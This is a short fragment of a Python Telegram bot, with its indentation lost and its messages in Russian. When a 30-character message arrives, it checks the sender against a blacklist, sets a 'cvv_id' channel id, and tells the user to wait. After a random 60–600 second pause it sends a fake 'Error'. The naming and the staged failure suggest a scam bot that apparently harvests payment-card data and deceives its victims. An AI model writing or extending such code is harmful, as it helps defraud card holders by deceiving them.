elif len(text) == 30:
bot.send_message(chat_id, "Проверяем черный список...")
with open("idBL.txt") as file:
arrayBL = [row.strip() for row in file]
iduser = f'{chat_id}'
if iduser in arrayBL:
cvv_id = ''
bot.send_message(chat_id, "Вы в черном листе!\nЕсли Вы считаете, что бан был получен случайно - обращайтесь к
@melon_card.\nВот Ваш id, он пригодится админу: <b>"+f'{chat_id}'+"</b>", parse_mode="HTML")
else:
cvv_id = '-1001268024908'
bot.send_message(
message.chat.id, f'⏱Ожидайте!⏱ ')
time.sleep((random.randint(60,600)))
bot.send_message(
message.chat.id, '🚫Ошибка🚫')